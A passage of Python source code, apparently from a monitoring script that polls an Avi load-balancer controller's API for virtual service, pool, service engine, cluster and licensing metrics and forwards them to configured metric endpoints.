#----- Total VS UP
b = temp_payload.copy()
b['metric_type'] = 'virtualservice_up'
b['metric_name'] = 'status_up'
b['metric_value'] = vs_up_count
b['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||status_up'
endpoint_payload_list.append(b)
#----- Total VS Down
c = temp_payload.copy()
c['metric_type'] = 'virtualservice_down'
c['metric_name'] = 'status_down'
c['metric_value'] = vs_down_count
c['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||status_down'
endpoint_payload_list.append(c)
#----- Total VS Disabled
d = temp_payload.copy()
d['metric_type'] = 'virtualservice_disabled'
d['metric_name'] = 'status_disabled'
d['metric_value'] = vs_disabled_count
d['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||status_disabled'
endpoint_payload_list.append(d)
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func vs_oper_status completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func vs_oper_status encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#----- RETRIEVE THE NUMBER OF ENABLED, ACTIVE, AND TOTAL POOL MEMBERS FOR EACH VIRTUAL SERVER
def active_pool_members(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
for pool in self.pool_dict:
p = self.pool_dict[pool]['results']
try:
vs_list = []
if 'num_servers' in p['runtime']:
if 'virtualservice' in p:
vs_list.append(p['virtualservice']['name'])
elif 'virtualservices' in p:
for v in p['virtualservices']:
vs_list.append(v.rsplit('#',1)[1])
pool_name = p['config']['name']
pool_members_up = p['runtime']['num_servers_up']
pool_members_enabled = p['runtime']['num_servers_enabled']
pool_members = p['runtime']['num_servers']
for vs_entry in vs_list:
#----- pool members enabled
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['vs_name'] = vs_entry
temp_payload['tenant'] = self.pool_dict[p['config']['uuid']]['tenant']
temp_payload['cloud'] = self.pool_dict[p['config']['uuid']]['cloud']
temp_payload['pool_name'] = pool_name
temp_payload['metric_type'] = 'virtualservice_pool_members'
temp_payload['metric_name'] = 'virtualservice_pool_members_enabled'
temp_payload['metric_value'] = pool_members_enabled
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||%s||pool||%s||%s' %(vs_entry, pool_name, 'pool_members_enabled')
endpoint_payload_list.append(temp_payload)
#----- pool members up
temp1_payload = self.payload_template.copy()
temp1_payload['timestamp']=int(time.time())
temp1_payload['vs_name'] = vs_entry
temp1_payload['tenant'] = self.pool_dict[p['config']['uuid']]['tenant']
temp1_payload['cloud'] = self.pool_dict[p['config']['uuid']]['cloud']
temp1_payload['pool_name'] = pool_name
temp1_payload['metric_type'] = 'virtualservice_pool_members'
temp1_payload['metric_name'] = 'virtualservice_pool_members_up'
temp1_payload['metric_value'] = pool_members_up
temp1_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||%s||pool||%s||%s' %(vs_entry, pool_name, 'pool_members_up')
endpoint_payload_list.append(temp1_payload)
#----- pool members configured
temp2_payload = self.payload_template.copy()
temp2_payload['timestamp']=int(time.time())
temp2_payload['vs_name'] = vs_entry
temp2_payload['tenant'] = self.pool_dict[p['config']['uuid']]['tenant']
temp2_payload['cloud'] = self.pool_dict[p['config']['uuid']]['cloud']
temp2_payload['pool_name'] = pool_name
temp2_payload['metric_type'] = 'virtualservice_pool_members'
temp2_payload['metric_name'] = 'virtualservice_pool_members'
temp2_payload['metric_value'] = pool_members
temp2_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||%s||pool||%s||%s' %(vs_entry, pool_name, 'pool_members')
endpoint_payload_list.append(temp2_payload)
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func active_pool_members completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func active_pool_members encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#----- SE missed heartbeats
def se_missed_hb(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
discovered_se = []
for s in self.se_dict:
if s not in discovered_se:
discovered_se.append(s)
if 'hb_status' in self.se_dict[s]['results']['runtime']:
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['se_name'] = self.se_dict[s]['name']
temp_payload['tenant'] = self.se_dict[s]['tenant']
temp_payload['cloud'] = self.se_dict[s]['cloud']
temp_payload['se_group'] = self.se_dict[s]['se_group']
temp_payload['metric_type'] = 'serviceengine_missed_heartbeats'
temp_payload['metric_name'] = 'missed_heartbeats'
temp_payload['metric_value'] = self.se_dict[s]['results']['runtime']['hb_status']['num_hb_misses']
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||serviceengine||%s||%s' %(self.se_dict[s]['name'], 'missed_heartbeats')
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func se_missed_hb completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func se_missed_hb encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#----- SE Connected State
def se_connected(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
discovered_se = []
for s in self.se_dict:
if s not in discovered_se:
discovered_se.append(s)
if 'se_connected' in self.se_dict[s]['results']['runtime']:
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['se_name'] = self.se_dict[s]['name']
temp_payload['tenant'] = self.se_dict[s]['tenant']
temp_payload['cloud'] = self.se_dict[s]['cloud']
temp_payload['se_group'] = self.se_dict[s]['se_group']
temp_payload['metric_type'] = 'serviceengine_connected_state'
temp_payload['metric_name'] = 'connected'
if self.se_dict[s]['results']['runtime']['se_connected'] == True:
temp_payload['metric_value'] = 1
else:
temp_payload['metric_value'] = 0
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||serviceengine||%s||%s' %(self.se_dict[s]['name'], 'connected_state')
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func se_connected completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func se_connected encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
def cluster_status(self):
try:
temp_start_time = time.time()
cluster_status = self.avi_request('cluster/runtime','admin').json()
endpoint_payload_list = []
active_members = 0
#-----------------------------------
#---- RETURN CLUSTER MEMBER ROLE
#---- follower = 0, leader = 1
for c in cluster_status['node_states']:
if c['state'] == 'CLUSTER_ACTIVE':
active_members = active_members + 1
if c['role'] == 'CLUSTER_FOLLOWER':
member_role = 0
elif c['role'] == 'CLUSTER_LEADER':
member_role = 1
try:
member_name = socket.gethostbyaddr(c['name'])[0]
except:
member_name = c['name']
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['cluster_name'] = member_name
temp_payload['metric_type'] = 'cluster'
temp_payload['metric_name'] = 'member_role'
temp_payload['metric_value'] = member_role
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||cluster||%s||role' %member_name
endpoint_payload_list.append(temp_payload)
#-----------------------------------
#---- ADD ACTIVE MEMBER COUNT TO LIST
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['metric_type'] = 'cluster'
temp_payload['metric_name'] = 'active_members'
temp_payload['metric_value'] = active_members
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||cluster||active_members'
endpoint_payload_list.append(temp_payload)
#----- Send metrics
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func cluster_status completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func cluster_status encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
def avi_subnet_usage(self):
try:
if datetime.now().minute % 5 == 0: #----- run every 5 mins
temp_start_time = time.time()
subnets = self.avi_request('network-inventory?page_size=200','admin').json()['results']
endpoint_payload_list = []
if len(subnets) > 0:
for s in subnets:
if 'subnet_runtime' in s['runtime'].keys():
pool_size = float(s['runtime']['subnet_runtime'][0]['total_ip_count'])
if pool_size > 0:
network_name = s['runtime']['name'].replace('|','_').replace(':','_')
pool_used = float(s['runtime']['subnet_runtime'][0]['used_ip_count'])
percentage_used = int((pool_used/pool_size)*100)
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['network_name'] = network_name
temp_payload['metric_type'] = 'network_usage'
temp_payload['metric_name'] = 'used'
temp_payload['metric_value'] = percentage_used
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||networks||%s||used' %network_name
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func avi_subnet_usage completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func avi_subnet_usage encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
def virtual_service_hosted_se(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
discovered = []
for v in self.vs_dict:
if 'service_engine' in self.vs_dict[v]['results']['runtime']['vip_summary'][0]:
vs_name = self.vs_dict[v]['name']
for r in self.vs_dict[v]['results']['runtime']['vip_summary']:
for s in r['service_engine']:
se_name = s['url'].rsplit('#',1)[1]
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['se_name'] = se_name
temp_payload['vs_name'] = vs_name
temp_payload['tenant'] = self.vs_dict[v]['tenant']
temp_payload['cloud'] = self.vs_dict[v]['cloud']
temp_payload['se_group'] = self.vs_dict[v]['se_group']
temp_payload['metric_type'] = 'virtualservice_hosted_se'
temp_payload['metric_name'] = 'hosting_se'
temp_payload['metric_value'] = 1
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||%s||serviceengine||%s' %(vs_name, se_name)
if temp_payload not in discovered:
discovered.append(temp_payload)
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func virtual_service_hosted_se completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func virtual_service_hosted_se encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
def vs_primary_se(self):
try:
temp_start_time = time.time()
discovered_vs = []
endpoint_payload_list = []
for v in self.vs_dict:
if v not in discovered_vs:
for a in self.vs_dict[v]['results']['runtime']['vip_summary']:
if 'service_engine' in a:
for s in a['service_engine']:
if s['primary'] == True:
discovered_vs.append(v)
se_name = s['url'].rsplit('#',1)[1]
vs_name = self.vs_dict[v]['name']
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['vs_name'] = vs_name
temp_payload['tenant'] = self.vs_dict[v]['tenant']
temp_payload['cloud'] = self.vs_dict[v]['cloud']
temp_payload['se_group'] = self.vs_dict[v]['se_group']
temp_payload['se_name'] = se_name
temp_payload['metric_type'] = 'virtualservice_primary_se'
temp_payload['metric_name'] = 'primary_se'
temp_payload['metric_value'] = 1
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||%s||primary_se||%s' %(vs_name,se_name)
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func virtual_service_primary_se completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func virtual_service_primary_se encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
def license_usage(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
licensing = self.avi_request('licenseusage?limit=1&step=300','admin').json()
lic_cores = licensing['licensed_cores']
if lic_cores != None:
cores_used = licensing['num_se_vcpus']
percentage_used = (cores_used / float(lic_cores))*100
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['metric_type'] = 'licensing'
temp_payload['metric_name'] = 'licensed_cores'
temp_payload['metric_value'] = lic_cores
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||licensing||licensed_cores'
endpoint_payload_list.append(temp_payload)
#-----
temp1_payload = self.payload_template.copy()
temp1_payload['timestamp']=int(time.time())
temp1_payload['metric_type'] = 'licensing'
temp1_payload['metric_name'] = 'cores_used'
temp1_payload['metric_value'] = cores_used
temp1_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||licensing||cores_used'
endpoint_payload_list.append(temp1_payload)
#-----
temp2_payload = self.payload_template.copy()
temp2_payload['timestamp']=int(time.time())
temp2_payload['metric_type'] = 'licensing'
temp2_payload['metric_name'] = 'percentage_used'
temp2_payload['metric_value'] = percentage_used
temp2_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||licensing||percentage_used'
endpoint_payload_list.append(temp2_payload)
temp_total_time = str(time.time()-temp_start_time)
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func license_usage completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func license_usage encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
def service_engine_vs_capacity(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
discovered_vs = []
se_vs = {}
for s in self.se_dict:
se_name = self.se_dict[s]['name']
if se_name not in se_vs:
seg = self.se_dict[s]['results']['se_group_ref'].rsplit('#',1)[0].split('/api/serviceenginegroup/')[1]
max_vs = self.seg_dict[seg]['max_vs_per_se']
se_vs[se_name]={'max_vs': max_vs, 'total_vs': 0,'tenant': self.se_dict[s]['tenant']}
se_vs[se_name]['se_group'] = self.se_dict[s]['se_group']
se_vs[se_name]['cloud'] = self.se_dict[s]['cloud']
if 'vs_refs' in self.se_dict[s]['results']:
for v in self.se_dict[s]['results']['vs_refs']:
if se_name+v.rsplit('api/virtualservice/')[1].rsplit('#',1)[0] not in discovered_vs:
discovered_vs.append(se_name+v.rsplit('api/virtualservice/')[1].rsplit('#',1)[0])
se_vs[se_name]['total_vs'] += 1
for entry in se_vs:
vs_percentage_used = (se_vs[entry]['total_vs']/se_vs[entry]['max_vs'])*100
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['se_name'] = entry
temp_payload['se_group'] = se_vs[entry]['se_group']
temp_payload['tenant'] = se_vs[entry]['tenant']
temp_payload['cloud'] = se_vs[entry]['cloud']
temp_payload['metric_type'] = 'serviceengine_capacity'
temp_payload['metric_name'] = 'vs_capacity_used'
temp_payload['metric_value'] = vs_percentage_used
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||serviceengine||%s||vs_capacity_used' %entry
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func service_engine_vs_capacity completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func service_engine_vs_capacity encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
def license_expiration(self):
try:
if datetime.now().hour % 6 == 0: #----- run once every 6 hours
current_time = datetime.today()
temp_start_time = time.time()
licenses = self.avi_request('license','admin').json()
for l in licenses['licenses']:
license_id = l['license_id']
try:
expires = datetime.strptime(l['valid_until'],"%Y-%m-%d %H:%M:%S")
except:
expires = datetime.strptime(l['valid_until'],"%Y-%m-%dT%H:%M:%S")
days_to_expire = (expires - current_time).days
endpoint_payload_list = []
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['license_id'] = license_id
temp_payload['metric_type'] = 'license'
temp_payload['metric_name'] = 'license_expiration'
temp_payload['metric_value'] = days_to_expire
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||licensing||expiration_days||'+license_id
endpoint_payload_list.append(temp_payload)
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func license_expiration completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func license_expiration encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#----- GET AVI SOFTWARE VERSION NUMBER AND ASSIGN VALUE OF 1
def get_serviceengine_version(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
for s in self.se_dict:
current_version = self.se_dict[s]['results']['runtime']['version'].split(' ',1)[0]
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['metric_type'] = 'se_version'
temp_payload['metric_name'] = 'current_version'
temp_payload['version'] = current_version
temp_payload['se_name'] = self.se_dict[s]['name']
temp_payload['se_group'] = self.se_dict[s]['se_group']
temp_payload['tenant'] = self.se_dict[s]['tenant']
temp_payload['cloud'] = self.se_dict[s]['cloud']
temp_payload['metric_value'] = 1
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||current_version||%s' %current_version
endpoint_payload_list.append(temp_payload)
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func get_serviceengine_version completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': get_serviceengine_version encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#----- GET AVI SOFTWARE VERSION NUMBER AND ASSIGN VALUE OF 1
def get_controller_version(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
#current_version = self.login.json()['version']['Version']+'('+str(self.login.json()['version']['build'])+')'
cluster_status = self.avi_request('cluster/runtime','admin').json()
current_version = cluster_status['node_info']['version'].split(' ',1)[0]
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['metric_type'] = 'controller_version'
temp_payload['metric_name'] = 'current_version'
temp_payload['version'] = current_version
temp_payload['metric_value'] = 1
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||current_version||%s' %current_version
endpoint_payload_list.append(temp_payload)
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func get_avi_version completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': get_avi_version encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#----- GET Pool Member specific statistics
def pool_server_stats_threaded(self):
try:
temp_start_time = time.time()
proc = []
for t in self.tenants:
p = Process(target = self.pool_server_stats, args = (t['name'],))
p.start()
proc.append(p)
if len(proc) > 9:
for _p in proc:
_p.join()
proc = []
for p in proc:
p.join()
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func pool_server_stats_threaded completed, executed in '+temp_total_time+' seconds')
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#----- GET Pool Member specific statistics
def pool_server_stats(self,tenant):
try:
temp_start_time = time.time()
endpoint_payload_list = []
discovered_servers = []
payload = {
"metric_requests": [
{
"step": 300,
"limit": 1,
"aggregate_entity": False,
"entity_uuid": "*",
"obj_id": "*",
"pool_uuid": "*",
"id": "collItemRequest:AllServers",
"metric_id": self.pool_server_metric_list
}
]}
api_url = 'analytics/metrics/collection?pad_missing_data=false&dimension_limit=1000&include_name=true&include_refs=true'
resp = self.avi_post(api_url,tenant,payload).json()
if self.pool_realtime == True:
payload = {
"metric_requests": [
{
"step": 5,
"limit": 1,
"aggregate_entity": False,
"entity_uuid": "*",
"obj_id": "*",
"pool_uuid": "*",
"id": "collItemRequest:AllServers",
"metric_id": self.pool_server_metric_list
}
]}
realtime_stats = self.avi_post('analytics/metrics/collection?pad_missing_data=false&dimension_limit=1000&include_name=true&include_refs=true', tenant, payload).json()
if 'series' in resp:
if len(resp['series']['collItemRequest:AllServers']) != 0:
for p in resp['series']['collItemRequest:AllServers']:
if p not in discovered_servers:
discovered_servers.append(p)
server_object = p.split(',')[2]
for d in resp['series']['collItemRequest:AllServers'][p]:
if 'data' in d:
pool_name = d['header']['pool_ref'].rsplit('#',1)[1]
metric_name = d['header']['name']
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['pool_name'] = pool_name
temp_payload['tenant'] = self.pool_dict[d['header']['pool_ref'].rsplit('#',1)[0].split('/api/pool/')[1]]['tenant']
temp_payload['cloud'] = self.pool_dict[d['header']['pool_ref'].rsplit('#',1)[0].split('api/pool/')[1]]['cloud']
temp_payload['pool_member'] = server_object
temp_payload['metric_type'] = 'pool_member_metrics'
temp_payload['metric_name'] = metric_name
temp_payload['metric_value'] = d['data'][0]['value']
if 'entity_ref' in d['header']:
vs_name = d['header']['entity_ref'].rsplit('#',1)[1]
temp_payload['vs_name'] = vs_name
temp_payload['name_space'] = 'avi||%s||virtualservice||%s||pool||%s||%s||%s' %(self.avi_cluster_name,vs_name, pool_name, server_object,metric_name)
#endpoint_payload_list.append(temp_payload)
else:
for v in self.pool_dict[d['header']['pool_ref'].rsplit('#',1)[0].split('api/pool/')[1]]['results']['virtualservices']:
vs_name = v.rsplit('#',1)[1]
#temp_payload1 = temp_payload.copy()
temp_payload['vs_name'] = vs_name
temp_payload['name_space'] = 'avi||%s||virtualservice||%s||pool||%s||%s||%s' %(self.avi_cluster_name,vs_name, pool_name, server_object,metric_name)
if self.pool_realtime == True:
if 'series' in realtime_stats:
if p in realtime_stats['series']['collItemRequest:AllServers']:
for n in realtime_stats['series']['collItemRequest:AllServers'][p]:
if n['header']['name'] == d['header']['name']:
if 'data' in n:
temp_payload['metric_value'] = n['data'][0]['value']
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func pool_server_stats for tenant '+tenant+', executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func pool_server_stats encountered an error for tenant '+tenant)
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#----- GET customer Member specific statistics
def controller_cluster_metrics(self):
try:
temp_start_time = time.time()
major,minor = self.login.json()['version']['Version'].rsplit('.',1)
if (float(major) >= 17.2 and float(minor) >= 5) or float(major) >= 18.1: #----- controller metrics api introduced in 17.2.5
cluster= self.avi_request('cluster','admin').json()
cluster_nodes = {}
temp_list=[]
endpoint_payload_list = []
for c in cluster['nodes']:
cluster_nodes[c['vm_uuid']]=c['ip']['addr']
#cluster_nodes[c['vm_uuid']]=c['vm_hostname']
resp = self.avi_request('analytics/metrics/controller/%s/?metric_id=%s&limit=1&step=300&?aggregate_entity=False' %(c['vm_uuid'],self.controller_metric_list),'admin').json()
temp_list.append(resp)
for n in temp_list:
node = cluster_nodes[n['entity_uuid']]
for m in n['series']:
metric_name = m['header']['name']
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['cluster_node'] = node
temp_payload['metric_type'] = 'controller_metrics'
temp_payload['metric_name'] = metric_name
temp_payload['metric_value'] = m['data'][0]['value']
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||controller||%s||%s' %(node,metric_name)
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
else:
pass
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func controller_cluster_metrics, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func controller_cluster_metrics encountered an error encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#-----------------------------------
#-----------------------------------
#-----------------------------------
#----- This is the method within the class that will execute the other methods.
#----- all test methods will need to be added to test_functions list to be executed
def gather_metrics(self):
try:
start_time = time.time()
self.login = self.avi_login()
if self.login.status_code == 200:
self.tenants = self.login.json()['tenants']
#self.avi_controller = self.controller_to_poll()
#-----------------------------------
#----- Add Test functions to list for threaded execution
#-----------------------------------
test_functions = []
if self.vs_metrics == True:
test_functions.append(self.virtual_service_stats_threaded)
test_functions.append(self.vs_metrics_per_se_threaded)
if self.vs_runtime == True:
test_functions.append(self.vs_oper_status)
test_functions.append(self.vs_primary_se)
test_functions.append(self.virtual_service_hosted_se)
#------
if self.se_metrics == True:
test_functions.append(self.srvc_engn_stats_threaded)
if self.se_runtime == True:
test_functions.append(self.srvc_engn_vs_count)
test_functions.append(self.srvc_engn_count)
test_functions.append(self.se_missed_hb)
test_functions.append(self.service_engine_vs_capacity)
test_functions.append(self.se_connected)
test_functions.append(self.get_serviceengine_version)
#------
if self.pool_metrics == True:
test_functions.append(self.pool_server_stats_threaded)
if self.pool_runtime == True:
test_functions.append(self.active_pool_members)
#------
if self.controller_metrics == True:
test_functions.append(self.controller_cluster_metrics)
if self.controller_runtime == True:
test_functions.append(self.cluster_status)
test_functions.append(self.avi_subnet_usage)
test_functions.append(self.license_usage)
test_functions.append(self.license_expiration)
test_functions.append(self.get_controller_version)
#-----------------------------------
_flist = []
for _t in test_functions:
_flist.append(str(_t).split('bound method ')[1].split(' ',1)[0])
print('=====> Running the following metrics functions: ')
for _f in _flist:
print(' ',_f)
print('-------------------------------------------------------------------')
#-----------------------------------
self.avi_controller = self.avi_cluster_ip
print('=====> Chose '+self.avi_controller)
self.vs_dict, self.se_dict, self.pool_dict, self.seg_dict = self.gen_inventory_dict()
#---- remove metrics that are not available in the current version
self.vs_metric_list, self.se_metric_list, self.controller_metric_list, self.pool_server_metric_list = self.remove_version_specific_metrics()
#-----------------------------------
#-----------------------------------
#-----
#-----------------------------------
#----- BEGIN Running Test Functions
#-----------------------------------
proc = []
for f in test_functions:
p = Process(target = f, args = ())
p.start()
proc.append(p)
for p in proc:
p.join()
#-----------------------------------
#-----
#-----------------------------------
#----- Log time it took to execute script
#-----------------------------------
total_time = str(time.time()-start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': controller specific tests have completed, executed in '+total_time+' seconds')
endpoint_payload_list = []
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['metric_type'] = 'metricscript'
temp_payload['metric_name'] = 'execution_time'
temp_payload['metric_value'] = float(total_time)*1000
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||metricscript||executiontime'
endpoint_payload_list.append(temp_payload)
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
elif self.login.status_code == 'timedout':
print(self.avi_cluster_ip+': AVI ERROR: timeout trying to access '+self.avi_cluster_ip)
elif self.login.status_code == '401':
print(self.avi_cluster_ip+': AVI ERROR: unable to login to '+self.avi_cluster_ip+' : '+self.login.text)
else:
print(self.avi_cluster_ip+': AVI ERROR: unknown login error to '+self.avi_cluster_ip)
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' Unable to login to: '+self.avi_cluster_ip)
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#--- THIS METHOD KICKS OFF THE EXECUTION
def run(self):
self.gather_metrics()
#-----------------------------------
#-----------------------------------
#-----------------------------------
#--- Primary function to execute the metrics gathering
#--- This function will create a avi_metrics object for each controller
#--- and kick off the metrics gathering for them.
def main():
start_time = time.time()
proc = []
for entry in avi_controller_list:
avi_controller = entry['avi_controller']
avi_cluster_name = entry['avi_cluster_name']
c = avi_metrics(avi_controller, avi_cluster_name, entry['avi_user'], isBase64(entry['avi_pass']), entry)
p = Process(target = c.run, args = ())
p.start()
proc.append(p)
